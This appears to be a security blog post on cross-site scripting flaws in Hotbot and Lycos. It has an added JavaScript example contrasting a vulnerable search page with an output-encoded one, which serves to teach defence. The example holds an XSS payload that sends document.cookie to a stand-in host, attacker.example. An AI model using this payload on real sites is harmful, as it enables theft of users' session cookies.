web application security lab

XSS in Lycos and Hotbot

As a fast follow-up to my Hotbot XSS, David “Aesthetico” Vieira-Kurz just found another XSS exploit in Hotbot and one in Lycos. I can’t stress enough how nasty things like this are. These are trusted brands, and with the advent of nastier and nastier things that can be done with XSS (which I’ll go into more in August after Jeremiah Grossman returns from Blackhat) it is critical that these companies invest some time and money into penetration testing and security assessments in general.

Identity theft is a billion-dollar industry, and these companies have a pretty huge responsibility to take care of their users and identify these risks before the security community does it for them. Investing in a good security penetration testing strategy is that important. Of course, finding competent security assessment folks for web applications is really difficult, I’ve found.
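The post doesn’t give the details of either bug. As an added example that is not part of the original post and is not the Hotbot or Lycos code, here is the classic shape of a reflected XSS in a search page: the query parameter echoed into the results markup without encoding, next to the same page with output encoding applied. The names escapeHtml, renderResultsVulnerable, renderResultsSafe, containsInjectedScript and the attacker payload are constructed for illustration.

```javascript
// Added example, not from the original post and not the actual Hotbot/Lycos bug
// (whose details the post does not give). A search results page reflects the
// user's query into HTML: first unsafely, then with output encoding applied.

// Minimal HTML escaper for text placed between tags or inside a quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the query is dropped straight into the markup, both as text
// and inside the value attribute of the search box.
function renderResultsVulnerable(query, results) {
  return `<h1>Results for "${query}"</h1>` +
    `<input name="q" value="${query}">` +
    `<ul>${results.map(r => `<li>${r}</li>`).join("")}</ul>`;
}

// Hardened: every untrusted value is escaped for the HTML context it lands in.
function renderResultsSafe(query, results) {
  const q = escapeHtml(query);
  return `<h1>Results for "${q}"</h1>` +
    `<input name="q" value="${q}">` +
    `<ul>${results.map(r => `<li>${escapeHtml(r)}</li>`).join("")}</ul>`;
}

// Crude regression check: does the rendered page contain a script tag or an
// inline event handler that was not part of the template? This is a test
// helper, not a sanitizer; it does not try to catch every XSS vector.
function containsInjectedScript(html) {
  return /<script\b/i.test(html) || /\bon\w+\s*=/i.test(html);
}

// Constructed attacker input, as it would arrive in ?q=... after URL decoding.
// The leading "> breaks out of the value="..." attribute in the vulnerable page.
const PAYLOAD =
  '"><script>document.location="http://attacker.example/?c="+document.cookie</script>';

// Stand-alone demonstration.
console.log("vulnerable page executes script:",
  containsInjectedScript(renderResultsVulnerable(PAYLOAD, ["result one"])));
console.log("hardened page executes script:",
  containsInjectedScript(renderResultsSafe(PAYLOAD, ["result one"])));
```

The point a pentester looks for on a search engine is exactly this: the query string is the most visible input that gets reflected into the page, and it is reflected in more than one context (heading text, input attribute, sometimes a title tag), so each spot needs encoding appropriate to where it lands.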

/RSnake
